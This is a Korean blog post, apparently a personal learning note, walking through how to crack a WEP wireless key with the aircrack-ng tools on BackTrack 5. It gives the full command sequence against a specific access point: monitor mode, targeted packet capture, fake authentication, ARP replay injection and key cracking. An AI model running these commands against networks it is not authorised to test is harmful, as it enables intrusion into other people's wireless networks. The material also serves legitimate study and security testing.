티스토리 뷰

Tip

Wireless Hacking - WEP Key Crack

do9dark 2016. 9. 3. 17:21

0x00. 환경구성

OS : BackTrack 5 R3 (32-bit)

Kernel : Linux bt 3.2.6


0x01. iwconfig

Configure a wireless network interface.

iwconfig is similar to ifconfig, but is dedicated to the wireless interfaces.


# iwconfig


0x02. airmon-ng

airmon-ng is script can be used to enable monitor mode on wireless interfaces.


airmon-ng <start|stop> <interface>


# airmon-ng start wlan0


0x03. airodump-ng

A wireless packet capture tool for aircrack-ng.


airodump-ng [options] <interface>


# airodump-ng mon0


To capture a specific wireless.


[Options]

-c <channel>[,<channel>[, ...]]

--channel <channel>[,<channel>[, ...]]

: Indicate the channel(s) to listen to. By default airodump-ng hop on 2.4GHz channels.

-w <prefix>

--wirte <prefix>

: Is the dump file prefix to use. If this option is not given, it will only show data on the screen. Beside this file a CSV file with the same filename as the capture will be created.


[Filter options]

-d <bssid>

--bssid <bssid>

: It will only show networks, matching the given bssid.


# airodump-ng -c 9 -d 64:e5:99:0f:38:e2 -w  WEP-Key mon0


0x04. aireplay-ng

Inject packets into a wireless network to generate traffic.

The fake authentication attack.


aireplay-ng <options> <replay interface>


[Attack modes]

-1 <delay>

--fakeauth=<delay>

: The fake authentication attack allows you to perform the two types of WEP authentication(Open System and Shared Key) plus associate with the access point (AP).


[Replay options]

-e <essid>

: Fake Authentication attack

: Set target SSID.

-a <bssid>

: Set Access Point MAC address.

-h <smac>

: Set source MAC address.



# aireplay-ng -1 0 -e WEP -a 64:e5:99:0f:38:e2 -h 00:08:9f:da:bf:bf mon0


The class ARP request replay attack.


aireplay-ng <options> <replay interface>


[Attack modes]

-3

--arpreplay

: The class ARP request replay attack is the most effective way to generate new initialization vectors (IVs), and works very reliably.


[Filter options]

-b <bssid>

: MAC address of Access Point.


[replay options]

-h <bssid>

: Set Access Point MAC address.


# aireplay-ng -3 -b 64:e5:99:0f:38:e2 -h 00:08:9f:da:bf:bf mon0


0x05. aircrack-ng

A 802.11 WEP / WPA-PSK Key Cracker.


aircrack-ng [options] <.cap / .ivs file(s)>


# aircrack-ng WEP-Key-01.cap


댓글
«   2024/10   »
1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31
링크
공지사항
Total
Today
Yesterday